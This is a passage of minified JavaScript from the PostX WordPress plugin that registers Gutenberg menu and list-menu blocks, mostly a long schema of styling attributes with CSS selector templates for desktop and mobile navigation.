"},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Blog")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r])))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item "},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Features")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r])))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item"},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Support"))))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item "},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"About Us")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r]))))))))}},74955:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(6343),n=l(53283);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks,s=(0,a.Z)("https://wpxpo.com/docs/postx/postx-menu/","block_docs");r("ultimate-post/menu",{title:__("Menu - PostX","ultimate-post"),icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/menu.svg",alt:"Menu PostX"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Set Up and Organize Your Site's Navigation","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:s,rel:"noreferrer"},__("Documentation","ultimate-post"))),keywords:[__("menu","ultimate-post"),__("mega","ultimate-post"),__("mega menu","ultimate-post")],supports:{html:!1,reusable:!1,align:["center","wide","full"]},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},menuMvResCss:{type:"string",default:"",style:[{selector:""}]},menuInline:{type:"boolean",default:!0,style:[{depends:[{key:"menuInline",condition:"==",value:!1}]},{depends:[{key:"menuInline",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout,\n                            .postx-page {{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content { flex-direction: row; }"}]},menuAlign:{type:"string",default:"center"},menuAlignItems:{type:"string",default:"stretch",style:[{selector:"{{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout,\n                            .postx-page {{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content { align-items: {{menuAlignItems}}; }"}]},menuItemGap:{type:"object",default:{lg:"16",ulg:"px"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, .postx-page {{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { gap: {{menuItemGap}};}"}]},menuBg:{type:"object",default:{openColor:0,type:"color",color:"",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { border-radius: {{menuRadius}};}"}]},menuMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { margin:{{menuMargin}}; }"}]},menuPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { padding:{{menuPadding}}; }"}]},inheritThemeWidth:{type:"boolean",default:!0,style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { max-width: 100%; }"}]},menuContentWidth:{type:"object",default:{lg:"1140",ulg:"px"},style:[{depends:[{key:"inheritThemeWidth",condition:"==",value:!1}],selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { max-width: {{menuContentWidth}};}"}]},dropIcon:{type:"string",default:"collapse_bottom_line"},dropColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColor}}; }'}]},dropColorHvr:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColorHvr}}; }'}]},dropSize:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{dropSize}}; width: {{dropSize}}; }'}]},dropSpacing:{type:"object",default:{lg:"8",ulg:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { gap: {{dropSpacing}}; }'}]},itemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text'}]},itemColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }'}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},currentItemStyle:{type:"boolean",default:!0},itemColorHvr:{type:"string",default:"#037fff",style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'}]},itemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#6ee7b7"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#6ee7b7"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container\n                    '}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff",type:"solid"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff",type:"solid"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }'}]},itemPadding:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { padding:{{itemPadding}}; }'}]},iconAfterText:{type:"boolean",default:!1},iconSize:{type:"object",default:{lg:"16",ulg:"px"},style:[{selector:'\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg,\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon img { height: {{iconSize}}; width: {{iconSize}}; }'}]},iconSpacing:{type:"object",default:{lg:"10",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label { gap: {{iconSpacing}}; }'}]},iconColor:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { fill:{{iconColor}}; stroke:{{iconColor}}; }'}]},iconColorHvr:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { fill:{{iconColorHvr}}; stroke:{{iconColorHvr}};}'}]},hasRootMenu:{type:"string",default:""},menuHamAppear:{type:"boolean",default:!0},mvTransformToHam:{type:"string",default:"800",style:[{depends:[{key:"menuHamAppear",condition:"==",value:!0}]}]},previewMobileView:{type:"string",default:""},mvPopWidth:{type:"string",default:{_value:"84",unit:"%",onlyUnit:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper { width: {{mvPopWidth}}; }"}]},menuResStructure:{type:"string",default:"mv_slide"},hamExpandedPadding:{type:"object",default:{top:"10",right:"0",bottom:"10",left:"15",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuResStructure",condition:"==",value:"mv_accordian"}],selector:"{{ULTP}} .ultp-mobile-view-container .ultp-mobile-view-wrapper .ultp-mobile-view-body .wp-block-ultimate-post-menu-item .ultp-menu-item-content { padding: {{hamAccorPadding}}; }"}]},mvAnimationDuration:{type:"string",default:"400"},mvDrawerPosition:{type:"string",default:"left"},previewHamIcon:{type:"string",default:""},mvHamIcon:{type:"string",default:"hamicon_3",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},mvHamIconSize:{type:"string",default:"24",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon svg { height: {{mvHamIconSize}}px; width: {{mvHamIconSize}}px; }"}]},hamVClr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mv-ham-icon svg { fill: {{hamVClr}}; }"}]},hamVBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon { border-radius: {{hamVRadius}}; }"}]},hamVShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon { padding: {{hamVPadding}}; }"}]},hamVClrHvr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mv-ham-icon:hover svg { fill: {{hamVClrHvr}}; }"}]},hamVBgHvr:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},hamVBorderHvr:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},hamVRadiusHvr:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover { border-radius: {{hamVRadiusHvr}}; }"}]},hamVShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},naviIcon:{type:"string",default:"rightAngle2",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},naviExpIcon:{type:"string",default:"arrowUp2",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuResStructure",condition:"==",value:"mv_accordian"}]}]},naviIconSize:{type:"string",default:"18",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{naviIconSize}}px; width: {{naviIconSize}}px; }"}]},naviIconClr:{type:"string",default:"#000",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{naviIconClr}}; }"}]},naviIconClrHvr:{type:"string",default:"#000",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-hammenu-accordian-active > .ultp-menu-item-wrapper >  .ultp-menu-item-label-container > .ultp-menu-item-dropdown svg,\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown:hover svg { color: {{naviIconClrHvr}}; }"}]},closeIcon:{type:"string",default:"close_line",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},closeSize:{type:"string",default:"18",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close svg { height: {{closeSize}}px; width: {{closeSize}}px; }"}]},closeClr:{type:"string",default:"#fff",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close svg { color: {{closeClr}}; }"}]},closeClrHvr:{type:"string",default:"#fff",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close:hover svg { color: {{closeClrHvr}}; }"}]},closeWrapBg:{type:"string",default:"#999999",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close  { background-color: {{closeWrapBg}}; }"}]},closeWrapBgHvr:{type:"string",default:"#ED2A2A",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close:hover  { background-color: {{closeWrapBgHvr}}; }"}]},closeSpace:{type:"object",default:{left:0,unit:"px",right:-44},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { margin: {{closeSpace}}; }"}]},closePadding:{type:"object",default:{unit:"px",top:"8",right:"8",bottom:"8",left:"8"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { padding: {{closePadding}}; }"}]},closeRadius:{type:"object",default:{top:"26",right:"26",bottom:"26",left:"26",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { border-radius: {{closeRadius}}; }"}]},closeBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close"}]},menuMvInheritCss:{type:"boolean",default:!1},mvItemColor:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-text { color: {{mvItemColor}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container svg { color: {{mvItemColor}}; } "}]},mvItemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container"}]},mvItemColorHvr:{type:"string",default:"#6044FF",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover .ultp-menu-item-label-text { color: {{mvItemColorHvr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover svg { color: {{mvItemColorHvr}}; } "}]},mvItemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#fff",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover"}]},mvItemSpace:{type:"string",default:"0",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body .ultp-menu-content, \n                        {{ULTP}} .ultp-mobile-view-body { gap: {{mvItemSpace}}px; }"}]},mvItemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-text"}]},mvItemBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:1,left:0},color:"#E6E6E6",type:"solid"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container"}]},mvItemRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container { border-radius:{{mvItemRadius}}; }"}]},mvItemPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"",right:"",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container { padding:{{mvItemPadding}}; }"}]},mvHeadtext:{type:"string",default:"Menu"},mvHeadBg:{type:"object",default:{openColor:1,type:"color",color:"#F1F1F1",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head"}]},mvHeadPadding:{type:"object",default:{lg:{top:"18",bottom:"18",left:"24",right:"4",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head { padding: {{mvHeadPadding}}; }"}]},mvHeadBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:2,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head"}]},backClr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label { color: {{backClr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con svg { color: {{backClr}}; }"}]},backClrHvr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con:hover .ultp-mv-back-label { color: {{backClrHvr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con:hover svg { color: {{backClrHvr}}; }"}]},backTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"capitalize",family:"",weight:"400"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con .ultp-mv-back-label"}]},backIcon:{type:"string",default:"leftArrowLg",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},backIconSize:{type:"string",default:"20",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-back-label-con svg { height: {{backIconSize}}px; width: {{backIconSize}}px; }"}]},backIconSpace:{type:"string",default:"10",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con { gap: {{backIconSpace}}px; }"}]},mvBodyBg:{type:"object",default:{openColor:1,type:"color",color:"#ffffff",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},mvOverlay:{type:"string",default:"rgba(0,10,20,.3411764706)",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-container { background: {{mvOverlay}}; }"}]},mvBodyPadding:{type:"object",default:{lg:{top:"16",bottom:"24",left:"16",right:"16",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body { padding: {{mvBodyPadding}}; }"}]},mvBodyBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:2,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},mvBodyShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-menu-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},82279:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(60276);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,BlockControls:c}=wp.blockEditor,{useState:u,useEffect:d,useRef:m,Fragment:g,useMemo:y}=wp.element;function b(e){const t=m(null),[l,b]=u("Content"),{setAttributes:v,name:h,className:f,attributes:k,clientId:w,attributes:{previewImg:x,blockId:T,advanceId:_,dropIcon:C,iconAfterText:E}}=e,S={setAttributes:v,name:h,attributes:k,setSection:b,section:l,clientId:w};d((()=>{const e=w.substr(0,6);T?T&&T!=e&&v({blockId:e}):v({blockId:e})}),[w]),d((()=>{const e=t.current;e?e.iconAfterText==E&&e.dropIcon==C||((0,i.Gu)(w),t.current=k):t.current=k}),[k]);const P=y((()=>(0,n.Kh)(k,"ultimate-post/list-menu",T,!1)),[k,w]);return x?(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x}):(0,a.createElement)(g,null,(0,a.createElement)(c,null,(0,a.createElement)(r.w,{isSelected:e.isSelected,clientId:w,store:S})),(0,a.createElement)(s,null,(0,a.createElement)(r.K,{store:S})),(0,a.createElement)("div",(0,o.Z)({},_&&{id:_},{className:`ultp-block-${T} ${f} ultpMenuCss`}),P&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:P}}),(0,a.createElement)("div",{className:"ultp-list-menu-wrapper"},(0,a.createElement)("div",{className:"ultp-list-menu-content"},(0,a.createElement)(p,{template:[["ultimate-post/menu-item",{menuItemText:"List Item"}],["ultimate-post/menu-item",{menuItemText:"List Item"}],["ultimate-post/menu-item",{menuItemText:"List Item"}]],allowedBlocks:["ultimate-post/menu-item"]})))))}},38523:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l}=e.attributes,n={},r=Object.keys(n);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} 